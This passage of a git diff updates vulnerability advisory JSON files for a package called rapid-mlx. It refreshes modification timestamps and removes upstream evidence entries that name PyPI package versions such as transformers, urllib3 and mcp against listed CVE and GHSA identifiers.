"2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-489j-g2vx-39wf", "CVE-2025-3262", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-3263.json b/advisories/BREW-rapid-mlx-CVE-2025-3263.json index eae004e01b..0bf4339c33 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-3263.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-3263.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-3263", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-q2wp-rjmx-x6x9", "CVE-2025-3263", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-3264.json b/advisories/BREW-rapid-mlx-CVE-2025-3264.json index f5d8bc8dbd..82c90cc7ce 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-3264.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-3264.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-3264", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-jjph-296x-mrcr", "CVE-2025-3264", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-3777.json b/advisories/BREW-rapid-mlx-CVE-2025-3777.json index bf22410abe..4da7b0998b 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-3777.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-3777.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-3777", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-phhr-52qp-3mj4", "CVE-2025-3777", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-3933.json b/advisories/BREW-rapid-mlx-CVE-2025-3933.json index c7ea868203..56198f9fa4 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-3933.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-3933.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-3933", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-37mw-44qp-f5jm", "CVE-2025-3933", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-43859.json b/advisories/BREW-rapid-mlx-CVE-2025-43859.json index 72c3d53758..cb2c68b440 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-43859.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-43859.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-43859", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:32Z", "upstream": [ "GHSA-vqfr-h8mv-ghfj", "CVE-2025-43859", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "h11", - "subject_version": "0.16.0", - "key": "pkg:pypi/h11@0.16.0", - "resource": "h11" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-4565.json b/advisories/BREW-rapid-mlx-CVE-2025-4565.json index 946f0d23f5..45558c9ee2 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-4565.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-4565.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-4565", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-8qvm-5x2c-j2w7", "CVE-2025-4565", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "protobuf", - "subject_version": "7.36.1", - "key": "pkg:pypi/protobuf@7.36.1", - "resource": "protobuf" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-50181.json b/advisories/BREW-rapid-mlx-CVE-2025-50181.json index c54eb9d102..73e69031d4 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-50181.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-50181.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-50181", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-pq67-6m6q-mj2v", "CVE-2025-50181", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-50182.json b/advisories/BREW-rapid-mlx-CVE-2025-50182.json index 85454003b9..0f020fcdb2 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-50182.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-50182.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-50182", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-48p4-8xcf-vxj5", "CVE-2025-50182", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-5197.json b/advisories/BREW-rapid-mlx-CVE-2025-5197.json index 1d7e109f90..d538295521 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-5197.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-5197.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-5197", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-9356-575x-2w9m", "CVE-2025-5197", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-53365.json b/advisories/BREW-rapid-mlx-CVE-2025-53365.json index c0ee5b99d7..433b83c956 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-53365.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-53365.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-53365", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-28T13:10:53Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-j975-95f5-7wqh", "CVE-2025-53365", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mcp", - "subject_version": "2.1.1", - "key": "pkg:pypi/mcp@2.1.1", - "resource": "mcp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-53366.json b/advisories/BREW-rapid-mlx-CVE-2025-53366.json index 96e475e11b..444e632cc5 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-53366.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-53366.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-53366", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-28T13:10:53Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-3qhf-m339-9g5v", "CVE-2025-53366", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mcp", - "subject_version": "2.1.1", - "key": "pkg:pypi/mcp@2.1.1", - "resource": "mcp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-54121.json b/advisories/BREW-rapid-mlx-CVE-2025-54121.json index fe6d9d5c70..1c2a32d716 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-54121.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-54121.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-54121", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-2c2j-9gv5-cj73", "CVE-2025-54121", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.6.0", - "key": "pkg:pypi/starlette@1.6.0", - "resource": "starlette" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-6051.json b/advisories/BREW-rapid-mlx-CVE-2025-6051.json index a425aaf6b3..de2bc3dd5f 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-6051.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-6051.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-6051", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-rcv9-qm8p-9p6j", "CVE-2025-6051", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-62727.json b/advisories/BREW-rapid-mlx-CVE-2025-62727.json index 4cd79441f7..0e2e54a277 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-62727.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-62727.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-62727", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-7f5h-v6xp-fcq8", "CVE-2025-62727", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.6.0", - "key": "pkg:pypi/starlette@1.6.0", - "resource": "starlette" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-6638.json b/advisories/BREW-rapid-mlx-CVE-2025-6638.json index 6964ca6dec..ee7634fce7 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-6638.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-6638.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-6638", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-59p9-h35m-wg4g", "CVE-2025-6638", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-66416.json b/advisories/BREW-rapid-mlx-CVE-2025-66416.json index 33ec0872d7..efd9527b5b 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-66416.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-66416.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-66416", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-28T13:10:53Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-9h52-p55h-vw2f", "CVE-2025-66416", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mcp", - "subject_version": "2.1.1", - "key": "pkg:pypi/mcp@2.1.1", - "resource": "mcp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-66418.json b/advisories/BREW-rapid-mlx-CVE-2025-66418.json index a47ba24218..1bc14b51fc 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-66418.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-66418.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-66418", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-gm62-xv2j-4w53", "CVE-2025-66418", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-66471.json b/advisories/BREW-rapid-mlx-CVE-2025-66471.json index 22c456ab42..dbd198948c 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-66471.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-66471.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-66471", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-2xpw-w6gg-jr37", "CVE-2025-66471", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-68146.json b/advisories/BREW-rapid-mlx-CVE-2025-68146.json index facb55cf07..52378b9feb 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-68146.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-68146.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-68146", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:32Z", "upstream": [ "GHSA-w853-jp5j-5j7f", "CVE-2025-68146", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "filelock", - "subject_version": "3.32.5", - "key": "pkg:pypi/filelock@3.32.5", - "resource": "filelock" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-6921.json b/advisories/BREW-rapid-mlx-CVE-2025-6921.json index 10a357c9cd..4d2edcc484 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-6921.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-6921.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-6921", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-4w7r-h757-3r74", "CVE-2025-6921", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-0994.json b/advisories/BREW-rapid-mlx-CVE-2026-0994.json index 76299f3546..093ccc3880 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-0994.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-0994.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-0994", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-7gcm-g887-7qv7", "CVE-2026-0994", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "protobuf", - "subject_version": "7.36.1", - "key": "pkg:pypi/protobuf@7.36.1", - "resource": "protobuf" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-1260.json b/advisories/BREW-rapid-mlx-CVE-2026-1260.json index 8ae7b9ace1..791431a350 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-1260.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-1260.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-1260", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-38vq-g6vr-w8wf", "CVE-2026-1260", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "sentencepiece", - "subject_version": "0.2.2", - "key": "pkg:pypi/sentencepiece@0.2.2", - "resource": "sentencepiece" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-1839.json b/advisories/BREW-rapid-mlx-CVE-2026-1839.json index 7a8dadb94b..697db51716 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-1839.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-1839.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-1839", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-69w3-r845-3855", "CVE-2026-1839", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-21441.json b/advisories/BREW-rapid-mlx-CVE-2026-21441.json index 3015ef6107..688629f739 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-21441.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-21441.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-21441", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-38jv-5279-wg99", "CVE-2026-21441", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-22701.json b/advisories/BREW-rapid-mlx-CVE-2026-22701.json index 14da9d44e0..73af5c4791 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-22701.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-22701.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-22701", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:32Z", "upstream": [ "GHSA-qmgc-5h2g-mvrw", "CVE-2026-22701", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "filelock", - "subject_version": "3.32.5", - "key": "pkg:pypi/filelock@3.32.5", - "resource": "filelock" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-24486.json b/advisories/BREW-rapid-mlx-CVE-2026-24486.json index e258380520..f260d583dd 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-24486.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-24486.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-24486", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-wp53-j4wj-2cfg", "CVE-2026-24486", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-25645.json b/advisories/BREW-rapid-mlx-CVE-2026-25645.json index b3580b9751..7eb8d1475b 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-25645.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-25645.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-25645", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-gc5v-m9x4-r6x2", "CVE-2026-25645", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-32597.json b/advisories/BREW-rapid-mlx-CVE-2026-32597.json index 18a56929fc..63ab377168 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-32597.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-32597.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-32597", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-752w-5fwx-jx9f", "CVE-2026-32597", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-40347.json b/advisories/BREW-rapid-mlx-CVE-2026-40347.json index fd58631c35..2665341ef7 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-40347.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-40347.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-40347", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-mj87-hwqh-73pj", "CVE-2026-40347", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-42561.json b/advisories/BREW-rapid-mlx-CVE-2026-42561.json index 65bd405207..ca56c286ae 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-42561.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-42561.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-42561", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-pp6c-gr5w-3c5g", "CVE-2026-42561", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-4372.json b/advisories/BREW-rapid-mlx-CVE-2026-4372.json index b874a632a3..cfcdbb0b65 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-4372.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-4372.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-4372", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-29pf-2h5f-8g72", "CVE-2026-4372", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-44431.json b/advisories/BREW-rapid-mlx-CVE-2026-44431.json index 1f4b710a48..47845dcf6c 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-44431.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-44431.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-44431", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-qccp-gfcp-xxvc", "CVE-2026-44431", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-44432.json b/advisories/BREW-rapid-mlx-CVE-2026-44432.json index 0a93ad6b31..0cd909ef78 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-44432.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-44432.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-44432", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-mf9v-mfxr-j63j", 